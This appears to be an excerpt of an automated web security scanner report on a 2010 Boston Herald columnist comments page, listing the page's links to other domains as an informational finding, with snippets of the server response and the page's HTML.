<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.20. http://bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590%26format%3Dcomments&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/columnists/
http://gallery.pictopia.com/bostonherald/gallery/news/2010%20Mass.%20election
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/856fdd_baker_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590%26format%3Dcomments&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'GOP’s blue-chippers emerge amid losses');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818598,5,0);" ><img id="thumb_up_1818598" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818598,1,0);"><img id="thumb_down_1818598" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818598, 'Cheap');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818598#cnum1818598"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818598','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818603,5,0);" ><img id="thumb_up_1818603" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818603,1,0);"><img id="thumb_down_1818603" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818603, 'Cheap');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818603#cnum1818603"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818603','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818629,5,0);" ><img id="thumb_up_1818629" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818629,1,0);"><img id="thumb_down_1818629" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818629, 'FrankBarrett');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818629#cnum1818629"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818629','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818642,5,0);" ><img id="thumb_up_1818642" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818642,1,0);"><img id="thumb_down_1818642" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818642, 'ImSplainin');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818642#cnum1818642"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818642','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818648,5,0);" ><img id="thumb_up_1818648" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818648,1,0);"><img id="thumb_down_1818648" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818648, 'ImSplainin');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818648#cnum1818648"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818648','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818653,5,0);" ><img id="thumb_up_1818653" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818653,1,0);"><img id="thumb_down_1818653" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818653, 'dapperlongdead');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818653#cnum1818653"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818653','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818656,5,0);" ><img id="thumb_up_1818656" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818656,1,0);"><img id="thumb_down_1818656" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818656, 'Oneeyedmutt');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818656#cnum1818656"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818656','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818657,5,0);" ><img id="thumb_up_1818657" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818657,1,0);"><img id="thumb_down_1818657" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818657, 'jasmine2');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818657#cnum1818657"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818657','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818661,5,0);" ><img id="thumb_up_1818661" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818661,1,0);"><img id="thumb_down_1818661" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818661, 'l3ostonRedSox');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818661#cnum1818661"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818661','/news/columnists/view.bg?articleid=1294590&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818667,5,0);" ><img id="thumb_up_1818667" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818667,1,0);"><img id="thumb_down_1818667" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818667, 'timkickerooski');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments&cnum=1&at_comment=1818667#cnum1818667"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
